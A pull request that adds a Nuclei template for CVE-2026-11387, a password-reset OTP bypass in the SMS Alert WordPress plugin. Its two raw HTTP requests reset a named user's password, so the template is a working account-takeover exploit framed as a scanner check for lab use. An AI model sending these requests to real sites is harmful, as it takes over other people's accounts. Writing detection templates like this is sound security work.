### PR TITLE
Add CVE-2026-11387 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-11387.yaml
+++ b/http/cves/2026/CVE-2026-11387.yaml
@@ -1,0 +1,62 @@
+id: CVE-2026-11387
+
+info:
+  name: SMS Alert <=3.9.5 - Password Reset OTP Bypass
+  author: str4k3r
+  severity: critical
+  description: |
+    SMS Alert <=3.9.5 starts a password-reset transaction for a phone-backed
+    WordPress user but accepts the public option=smsalert-change-password-form
+    request without checking that the OTP transaction reached the validated
+    state. A caller who knows a target username can start the reset flow and
+    then submit matching new-password fields; the vulnerable version resets the
+    account and redirects with password-reset=true. Version 3.9.6 requires the
+    per-session OTP validation marker before processing that route. This
+    detection changes the supplied lab account password and is intended only
+    for a disposable test deployment.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-11387
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c31906da-f2fd-40ac-86e0-3f1ed0409d0c?source=cve
+    - https://plugins.trac.wordpress.org/changeset/3587983/sms-alert
+    - https://wordpress.org/plugins/sms-alert/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-11387
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: cozyvision1
+    product: sms-alert
+  tags: cve,cve2026,wordpress,wp-plugin,sms-alert,auth-bypass,account-takeover
+
+variables:
+  username: ""
+  new_password: "CVE11387-{{rand_base(16)}}"
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php?action=lostpassword HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_login={{url_encode(username)}}&wc_reset_password=1
+
+      - |
+        POST /?option=smsalert-change-password-form HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        option=smsalert-change-password-form&smsalert_user_newpwd={{url_encode(new_password)}}&smsalert_user_cnfpwd={{url_encode(new_password)}}
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        part: header
+        words:
+          - "password-reset=true"


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-11387. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.